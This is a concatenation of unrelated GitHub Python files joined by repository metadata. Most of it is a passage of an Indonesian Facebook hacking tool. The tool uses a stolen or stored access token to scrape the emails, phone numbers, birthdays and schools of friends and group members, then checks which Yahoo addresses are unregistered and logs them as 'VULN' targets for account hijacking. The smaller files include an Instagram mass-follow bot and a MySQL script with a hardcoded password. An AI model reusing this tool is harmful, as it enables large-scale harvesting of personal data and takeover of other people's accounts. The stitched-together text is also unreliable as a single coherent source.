print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print("\033[1;96m[✓] \033[1;92mGROUP SAYA")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+str(id))
print("\033[1;96m[➹] \033[1;97mNama\033[1;91m: \033[1;92m"+str(nama) + '\n')
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[✖] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def informasi():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
aid = raw_input('\033[1;96m[+] \033[1;93mMasukan ID/Nama\033[1;91m : \033[1;97m')
jalan('\033[1;96m[✺] \033[1;93mTunggu sebentar \033[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(r.text)
for i in cok['data']:
if aid in i['name'] or aid in i['id']:
x = requests.get("https://graph.facebook.com/"+i['id']+"?access_token="+toket)
z = json.loads(x.text)
print 43*"\033[1;96m="
try:
print '\033[1;96m[➹] \033[1;93mNama\033[1;97m : '+z['name']
except KeyError: print '\033[1;96m[?] \033[1;93mNama\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mID\033[1;97m : '+z['id']
except KeyError: print '\033[1;96m[?] \033[1;93mID\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mEmail\033[1;97m : '+z['email']
except KeyError: print '\033[1;96m[?] \033[1;93mEmail\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mNo HP\033[1;97m : '+z['mobile_phone']
except KeyError: print '\033[1;96m[?] \033[1;93mNo HP\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTempat tinggal\033[1;97m: '+z['location']['name']
except KeyError: print '\033[1;96m[?] \033[1;93mTempat tinggal\033[1;97m: \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mTanggal lahir\033[1;97m : '+z['birthday']
except KeyError: print '\033[1;96m[?] \033[1;93mTanggal lahir\033[1;97m : \033[1;91mTidak ada'
try:
print '\033[1;96m[➹] \033[1;93mSekolah\033[1;97m : '
for q in z['education']:
try:
print '\033[1;91m ~ \033[1;97m'+q['school']['name']
except KeyError: print '\033[1;91m ~ \033[1;91mTidak ada'
except KeyError: pass
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
else:
pass
else:
print"\033[1;96m[✖] \x1b[1;91mAkun tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Clone dari teman"
print "\x1b[1;97m3.\x1b[1;93m Clone dari member group"
print "\x1b[1;97m4.\x1b[1;93m Clone dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[\x1b[1;97m✺\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama+ '\n')
save = open('out/MailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/TemanMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[✺] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mID \033[1;91m: \033[1;92m"+id)
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
print("\033[1;96m[➹] \033[1;97mNama \033[1;91m: \033[1;92m"+nama)
save = open('out/GrupMailVuln.txt','a')
save.write("Nama : "+ nama + '\n' "ID : "+ id + '\n' "Email : "+ mail + '\n\n')
save.close()
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_file():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
files = raw_input("\033[1;96m[+] \033[1;93mNama File \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;96m[!] \x1b[1;91mFile tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
mpsh = []
jml = 0
jalan('\033[1;96m[✺] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
print("\033[1;96m[✓] \033[1;92mVULN")
print("\033[1;96m[➹] \033[1;97mEmail\033[1;91m: \033[1;92m"+mail)
save = open('out/MailVuln.txt','a')
save.write("Email: "+ mail + '\n\n')
save.close()
berhasil.append(mail)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile Tersimpan \033[1;91m:\033[1;97m out/FileMailVuln.txt"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
if __name__ == '__main__':
siapa()
| [
"noreply@github.com"
] | N0V4ID.noreply@github.com | |
d1ca03e375d629477112283390f4aec9f87f833e | 70f94eb2fc6190c97805f47c4268bece3d9fa0ba | /smoothing.py | 8155c566bfcf2252678294c6e976ee3a95d95778 | [] | no_license | DDJesus/smooth_avg | b8132172575c119047e33a39aa10459eaf500c11 | 976d41222a89f46c391c2c622725b3c9a3486661 | refs/heads/master | 2020-03-20T22:42:36.540241 | 2018-06-18T22:11:49 | 2018-06-18T22:11:49 | 137,811,909 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 599 | py | import numpy as np
test = [1000, 2000, 1570, 2100, 1170, 1860, 2060, 2080, 3100]
def smooth_avg(l, o):
new_l = l
outliers = o
count = 0
m = np.mean(new_l)
s = np.std(new_l, ddof=1)
max_n = 0
for x in range(len(new_l)):
item = new_l[x]
if item > m + s:
outliers.append(item)
new_l[x] = max_n
count += 1
else:
pass
if new_l[x] > max_n:
max_n = new_l[x]
if count == 0:
return outliers
else:
return smooth_avg(new_l, outliers)
print(smooth_avg(test, []))
| [
"noreply@github.com"
] | DDJesus.noreply@github.com |
be48ffa01aa280079ae37f24566d269afabbab18 | d2875f2518ebd8cb468a4752e56f99046047c52a | /dist/domain/role/huanggong/guan5.py | 20d17e60db72560f2d0d5e1b5727bf090a359ad2 | [] | no_license | tianyufighter/jiaofeiji_game | 6f5e73104424d04646e06ef5381e59ff62340cef | 728b57ad78b366efd166f425f72fb39496c598e8 | refs/heads/master | 2022-12-12T06:20:07.419641 | 2020-09-25T06:05:45 | 2020-09-25T06:05:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,771 | py | import random
import pygame
from dialog.huanggong.guan_dialog import GuanDialog
from role import DirAction
class Guan5(pygame.sprite.Sprite):
"""
士兵
"""
def __init__(self, x, y):
self.walk = DirAction("farmer55", "1394-8ddc27f7-", 4, 5, True)
self.pos_x = x
self.pos_y = y
self.width = 64
self.height = 93
self.dir = 0
self.step = 2
self.step_count = 0
self.stop = False
self.rect = pygame.Rect(self.pos_x, self.pos_y, self.width + 20, self.height + 20)
self.dialog = GuanDialog()
def draw(self, surface, x, y):
"""
绘制函数
:param surface: 背景
:param x: 窗口x坐标
:param y: 窗口y坐标
:return:
"""
image = self.walk.get_current_image(self.dir)
if self.stop:
surface.blit(self.dialog.surface, (self.pos_x - x, self.pos_y - y + self.height))
surface.blit(image, (self.pos_x - x, self.pos_y - y))
self.__move__()
def __move__(self):
if self.stop:
return
self.step_count += 1
if self.dir == 0:
self.pos_x += self.step
if self.pos_x < 0 or self.pos_x > (5760 - self.width):
self.pos_x -= self.step
self.pos_y += self.step
if self.pos_y > 0 or self.pos_y > (4320 - self.height):
self.pos_y -= self.step
elif self.dir == 1:
self.pos_x -= self.step
if self.pos_x < 0 or self.pos_x > (5760 - self.width):
self.pos_x += self.step
self.pos_y += self.step
if self.pos_y > 0 or self.pos_y > (4320 - self.height):
self.pos_y -= self.step
elif self.dir == 2:
self.pos_x -= self.step
if self.pos_x < 0 or self.pos_x > (5760 - self.width):
self.pos_x += self.step
self.pos_y -= self.step
if self.pos_y > 0 or self.pos_y > (4320 - self.height):
self.pos_y += self.step
elif self.dir == 3:
self.pos_x += self.step
if self.pos_x < 0 or self.pos_x > (5760 - self.width):
self.pos_x -= self.step
self.pos_y -= self.step
if self.pos_y > 0 or self.pos_y > (4320 - self.width):
self.pos_y += self.step
self.rect = pygame.Rect(self.pos_x, self.pos_y, self.width, self.height)
if self.step_count == 20:
self.step_count = 0
num = random.randrange(0, 4, 1)
self.dir = num
def isCollide(self, role):
if pygame.sprite.collide_rect(self, role):
self.stop = True
else:
self.stop = False
| [
"634522023@qq.com"
] | 634522023@qq.com |
ff8a299c9d32165282324d050f87b5e21287ec16 | 53d84da9cd7dd1d9b74383ca56061a50cc8b57c1 | /python3/bmi_main.py | 9370cf2a77360ebbf3aff5816719914f6755fa6c | [
"MIT"
] | permissive | yusufshakeel/Python-Project | 899be3fe5b709a19f98941137d49252566ebde98 | b6907fa5207952963e3c115f10a75adad4b095d4 | refs/heads/master | 2020-04-26T05:07:19.461418 | 2014-08-17T18:28:20 | 2014-08-17T18:28:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | py | from bmi import BMI #import BMI class from bmi module (file)
def main():
obj1 = BMI("Tom", 18, 145, 70) #create object
print("BMI for", obj1.getName(), "is", obj1.getBMI(), obj1.getStatus())
main() #call main function
| [
"yusufshakeel.in@gmail.com"
] | yusufshakeel.in@gmail.com |
f23c2757ed8e4ca90447aa22544c7b12337b52d2 | b3677987615b2948ec84c341ac06f1228aa66440 | /day_51-60/day_52/main.py | 4de54c3b3c125bc7ca7f4b933bd81c3927f36a03 | [] | no_license | MohamadHaziq/100-days-of-python | 38eb0ea90032fe771dc4974dbbd239c3ae46dcab | 1977d22566f76812a7df8806e52fa9b54527d144 | refs/heads/main | 2023-02-13T13:09:31.765007 | 2021-01-03T16:08:57 | 2021-01-03T16:08:57 | 314,592,788 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,228 | py | from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import ElementClickInterceptedException
import time
CHROME_DRIVER_PATH = "./chromedriver.exe"
SIMILAR_ACCOUNT = "insta"
USERNAME = "insta-email"
PASSWORD = "insta-pass"
class InstaFollower:
def __init__(self, path):
self.driver = webdriver.Chrome(executable_path=path)
def login(self):
self.driver.get("https://www.instagram.com/accounts/login/")
time.sleep(5)
username = self.driver.find_element_by_name("username")
password = self.driver.find_element_by_name("password")
username.send_keys(USERNAME)
password.send_keys(PASSWORD)
time.sleep(2)
password.send_keys(Keys.ENTER)
def find_followers(self):
time.sleep(5)
self.driver.get(f"https://www.instagram.com/{SIMILAR_ACCOUNT}")
time.sleep(2)
followers = self.driver.find_element_by_xpath('//*[@id="react-root"]/section/main/div/header/section/ul/li[2]/a')
followers.click()
time.sleep(2)
modal = self.driver.find_element_by_xpath('/html/body/div[4]/div/div/div[2]')
for i in range(10):
#In this case we're executing some Javascript, that's what the execute_script() method does.
#The method can accept the script as well as a HTML element.
#The modal in this case, becomes the arguments[0] in the script.
#Then we're using Javascript to say: "scroll the top of the modal (popup) element by the height of the modal (popup)"
self.driver.execute_script("arguments[0].scrollTop = arguments[0].scrollHeight", modal)
time.sleep(2)
def follow(self):
all_buttons = self.driver.find_elements_by_css_selector("li button")
for button in all_buttons:
try:
button.click()
time.sleep(1)
except ElementClickInterceptedException:
cancel_button = self.driver.find_element_by_xpath('/html/body/div[5]/div/div/div/div[3]/button[2]')
cancel_button.click()
bot = InstaFollower(CHROME_DRIVER_PATH)
bot.login()
bot.find_followers()
bot.follow() | [
"haziq.roslan@digitas.com"
] | haziq.roslan@digitas.com |
41b527071ce726caad5d3a7fbfab7a578b83c161 | 3cb67d0e1fbda4bb6a22d826c34d2eeb0d7283ed | /lolcat/cat_service.py | 65aa8458ba19de50d64b4aaf60f9583201d59282 | [] | no_license | kanr/python-jumpstart | dc6035877c87e5e6f873ada8abdc31067b43e4d0 | bb29ac2260c74e9910de993c9ad909bde62d3f36 | refs/heads/master | 2021-01-24T03:13:01.149078 | 2018-03-02T07:05:27 | 2018-03-02T07:05:27 | 122,880,777 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | #Connor aitken
import os
import shutil
import requests
def get_cat(folder, name):
url = 'http://consuming-python-services-api.azurewebsites.net/cats/random'
data = get_data_from_url(url)
save_image(folder, name, data)
def get_data_from_url(url):
response = requests.get(url, stream = True)
return response.raw
def save_image(folder, name, data):
file_name = os.path.join(folder, name + '.jpg')
with open(file_name, 'wb') as fout:
shutil.copyfileobj(data, fout)
| [
"connor.aitken@gmail.com"
] | connor.aitken@gmail.com |
3c770a2379cb86640ff65243bff4321c5d24a726 | f1616ef34f61a532d7866bc0b793f6e85df07ada | /blog/models.py | 3fcba11307d1471f90964bc2eed7281e131475ff | [] | no_license | katherine95/mysite | e9997c3205d1586be947606ff1a050cfcaf38088 | ce3d193fab1e89b5e75e0019446116d1a2f7db2e | refs/heads/master | 2020-05-31T17:43:09.702459 | 2017-06-12T01:02:35 | 2017-06-12T01:02:35 | 94,041,523 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 227 | py | from django.db import models
class Post(models.Model):
title = models.CharField(max_length=200)
body =models.TextField(max_length=350)
date =models.DateTimeField()
def __str__(self):
return self.title
| [
"kathiekim95@gmail.com"
] | kathiekim95@gmail.com |
c4f2b4f9d0ac3cb284f0b59256c30ad33b19b47d | 3532ae25961855b20635decd1481ed7def20c728 | /app/serwer/src/Serv/__init__.py | 03b3df43a5db72731ee42cc2f624d3047ba0f8f0 | [] | no_license | mcharmas/Bazinga | 121645a0c7bc8bd6a91322c2a7ecc56a5d3f71b7 | 1d35317422c913f28710b3182ee0e03822284ba3 | refs/heads/master | 2020-05-18T05:48:32.213937 | 2010-03-22T17:13:09 | 2010-03-22T17:13:09 | 577,323 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | import ConfigReader
import Group
import Logger
import Packet
import Parser
import UDPServer
import User
import UserAuthenticator
import UserDBReader
import UserGroupManager | [
"mcharmas@ffdda973-792b-4bce-9e62-2343ac01ffa1"
] | mcharmas@ffdda973-792b-4bce-9e62-2343ac01ffa1 |
df86e18aa118aa33e47a8f31b0c501946df0c58d | f912b88787579b6bd701789f34c81076bc3b359b | /connection.py | 46589ec061250af51438152a23f9c7d83fa22699 | [] | no_license | febimudiyanto/mysql-python | 5e616e8a3872eda1eaba2d51f559378dad264f9b | 43d452d23698ae0af26f906190e8d0c94ba64ad3 | refs/heads/main | 2023-04-05T05:08:58.955320 | 2021-04-20T16:11:55 | 2021-04-20T16:11:55 | 316,931,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,084 | py | # IP address dari server
'''
untuk terkoneksi dengan mysql secara remote, bisa digunakan command berikut:
mysql -u python-user -h <ip> -P <port> -p
> masukkan passwordnya
* insert
INSERT INTO table_name VALUES (column1_value, column2_value, column3_value, ...);
INSERT INTO logins(username, password) VALUES('administrator', 'adm1n_p@ss');
INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');
* ALTER
ALTER TABLE logins ADD newColumn INT;
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;
ALTER TABLE logins MODIFY oldColumn DATE;
ALTER TABLE logins DROP oldColumn;
* Update
UPDATE table_name SET column1=newvalue1, column2=newvalue2, ... WHERE <condition>;
UPDATE logins SET password = 'change_password' WHERE id > 1;
'''
HOST = "192.168.122.176"
DATABASE = "data_db"
USER = "python-user"
PASSWORD = "inirahasia"
# Cek koneksi database
db_connect = mysql.connect(host=HOST, user=USER, passwd = PASSWORD)
if db_connect:
print("koneksi sukses")
else:
print("koneksi gagal")
# Inisialisasi cursor()
mycursor = db_connect.cursor()
# Menampilkan database
mycursor.execute("Show databases")
#print(type(mycursor))
nama_db=DATABASE
lst=[]
for db in mycursor:
#mendapatkan list dari database
lst.append(db[0])
print(db[0])
# cek dan buat database
if nama_db in lst:
print("database",nama_db,"sudah ada")
else:
print(">database tidak ada")
mycursor.execute("create database if not exists "+nama_db)
print(" >>>database",nama_db,"sudah dibuat")
mycursor.execute("use "+nama_db)
for db in mycursor:
print(db[0])
| [
"noreply@github.com"
] | febimudiyanto.noreply@github.com |
240ab9621859a771e060884aca014181fb68ca3c | 5ca726786d01c2256de7b6baed3c286ddd8e0bae | /Portilla/Linear Regression/ml_basic.py | eaaa03bff0ff01cb29d6ab627770f5196c95128c | [] | no_license | m-squared96/Snippets-ML | c9e53d3493ac752353f4d90c4ed55708d6ae2dcc | 2e5530177fcf56c526c5e7624092657e88c81e5a | refs/heads/master | 2020-03-19T10:37:17.001057 | 2018-06-12T21:26:34 | 2018-06-12T21:26:34 | 136,386,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py | #!/usr/bin/python
import numpy as np
from sklearn.model_selection import train_test_split
x, y = np.arange(10).reshape((5,2)), range(5)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3)
for i in (x_train, x_test, y_train, y_test):
print(i) | [
"michael.moore34@mail.dcu.ie"
] | michael.moore34@mail.dcu.ie |
7cf29bf614e1f9a6d4e5cd8269daa64ebce39503 | a90888c62b2a24d71ba8f46536ebe75c52cf720e | /app/__init__.py | 7d373a109fab06911d7aad741dae9bb770f4757d | [] | no_license | Denniskamau/Tuklab | f7843fb92aac752cbe5e769f320d44b6f6f91856 | 1b1934f3e79ecc8fca89135255520adb4f67c999 | refs/heads/master | 2021-01-22T06:12:10.888017 | 2017-02-12T22:21:36 | 2017-02-12T22:21:36 | 81,747,943 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,451 | py | from flask import Flask, render_template,session
from flask.ext.bootstrap import Bootstrap
from flask.ext.mail import Mail
from flask.ext.wtf import Form
from wtforms import StringField, BooleanField, SubmitField, validators
from wtforms.validators import Required
from flask.ext.moment import Moment
from flask.ext.sqlalchemy import SQLAlchemy
from config import config
from flask.ext.login import LoginManager
bootstrap = Bootstrap()
mail = Mail()
moment = Moment()
db = SQLAlchemy()
login_manager = LoginManager()
login_manager.session_protection = 'strong'
login_manager.login_view = 'auth.login'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
mail.init_app(app)
moment.init_app(app)
login_manager.init_app(app)
db.init_app(app)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint, url_prefix='/auth')
return app
class NameForm(Form):
name = StringField('What is your name?', validators=[Required()])
email = StringField('email?', validators=[Required()])
submit = SubmitField('Submit')
@app.route('/', methods=['GET', 'POST'])
def index():
form = NameForm()
if form.validate_on_submit():
user =User.query.filter_by(username=form.name.data).first()
if user is None:
user = User(username = form.name.data)
db.session.add(user)
session['known'] = False
if app.config['TUKLAB_ADMIN']:
send_email(app.config['TUKLAB_ADMIN'], 'New User',
'mail/new_user', user=user)
else:
session['known'] = True
session['name'] = form.name.data
form.name.data=''
return redirect(url_for('index'))
return render_template('index.html',
form = form, name = session.get('name'),
known = session.get('known', False))
@app.route('/user/<name>')
def user(name):
return render_template('user.html',name=name)
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
from main import main as main_blueprint
app.register_blueprint(main_blueprint)
return app | [
"denniskamau3@gmail.com"
] | denniskamau3@gmail.com |
